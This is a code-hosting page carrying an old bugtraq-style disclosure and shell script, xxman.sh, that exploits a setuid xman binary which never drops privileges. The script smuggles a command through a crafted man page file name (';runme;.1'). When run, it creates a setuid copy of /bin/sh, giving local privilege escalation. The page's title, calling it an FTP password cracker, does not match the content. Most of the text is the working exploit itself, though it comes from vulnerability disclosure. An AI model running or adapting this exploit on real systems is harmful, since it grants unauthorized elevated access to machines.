xxman.sh
来自「一个FTP密码破解程序的源代码」· Shell 代码 · 共 35 行
SH
35 行
xman doesn't drop privileges anywheres in the program. but, does support suid installation. so, exploiting via a system call is much easier than thebuffer overflow in MANPATH, mentioned in another bugtraq posting. here is an example of such anexploitation possibility:-- xxman.sh --#!/bin/sh# example of xman exploitation. xman# supports privileges. but, never# drops them.# Vade79 -> v9@realhalo.org -> realhalo.org. MANPATH=~/xmantest/mkdir -p ~/xmantest/man1cd ~/xmantest/man1touch ';runme;.1'cat << EOF >~/xmantest/runme#!/bin/shcp /bin/sh ~/xmanshchown `id -u` ~/xmanshchmod 4755 ~/xmanshEOFchmod 755 ~/xmantest/runmeecho "click the ';runme;' selection," \"exit. then, check for ~/xmansh."xman -bothshown -notopboxrm -rf ~/xmantest-- xxman.sh --Vade79 -> v9@realhalo.org -> realhalo.org.
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?